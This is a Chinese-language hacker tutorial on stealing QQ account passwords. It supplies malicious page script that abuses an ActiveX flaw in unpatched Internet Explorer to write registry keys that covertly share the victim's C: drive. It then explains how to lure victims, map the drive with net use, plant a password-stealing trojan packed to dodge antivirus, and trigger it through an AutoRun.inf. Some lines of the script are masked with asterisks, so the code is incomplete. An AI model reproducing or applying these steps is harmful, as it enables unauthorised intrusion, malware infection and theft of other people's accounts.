黑客通過網頁竊取QQ方法解析

　　要想偷別人的QQ，方法有很多了。利用惡意網頁使對方的電腦被共享出來是很有趣的一招。方法是：在你的網站網頁中加入如下內容的代碼：

<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject()Shl.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Type",0,"REG_DWORD");
Shl.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Path","C:");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>

　　上面的代碼大家一定很容易讀懂，簡單說來就是通過修改對方注冊表中的鍵值，把對方的C盤共享出來，如果想讓對方的其他盤都共享請自行設置。

　　述代碼中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外殼對象。WSH是微軟提供的一種基於32位Windows平台的、與語言無關的腳本解釋機制，它使得腳本能夠直接在Windows桌面或命令提示符下運行。WSH使得腳本可以被執行，就象執行批處理一樣。以“Shl.RegWrite”開頭的這幾句代碼的作用是寫入浏覽者的注冊表，就是它們使得對方的硬盤被共享的。把“Flags”的鍵值設為00000302可以隱藏共享，使對方無法發現，非常隱蔽。

　　網頁做好後，把它上傳你的主頁空間，騙他浏覽你的網頁（就看你的嘴皮子功夫了），如果對方的IE沒有打補丁（網上這樣的電腦有很多），就可以把他的C盤共享出來。整個方法的原理就是把com.ms.activeX.ActiveXComponent對象嵌入<APPLET>標記中，這樣會導致任意創建和解釋執行ActiveX對象，使我們可以創建任意文件、運行程序、寫注冊表。未打補丁的IE，在打開含有上述代碼的網頁時不會有任何警告，我們就是利用這個漏洞把對方的硬盤被共享出來。

　　等對方中招後，就把對方的硬盤映射過來，可以使用net use命令，也可以使用網絡刺客II等軟件。下一步可以給對方植入一個盜QQ的軟件，比方說QQ殺手等，注意一定要用ASPack或其他加殼軟件給木馬加殼（其實就是另類“壓縮”），防止殺毒軟件發現。

　　最後，打開記事本鍵入以下內容：

[AutoRun]
open=winnt32.exe

　　保存為AutoRun.inf，其中的winnt32.exe為木馬文件。把AutoRun.inf和winnt32.exe一起拷到對方某分區的根目錄下。這樣，只要他雙擊該分區就會中木馬！這樣可以大大的增加木馬運行的主動性！須知許多人現在都非常警惕，不熟悉的文件他們輕易的不會運行，而這種方法就很難防范了。

　　以後，你就等著用郵箱收信收對方的QQ密碼吧。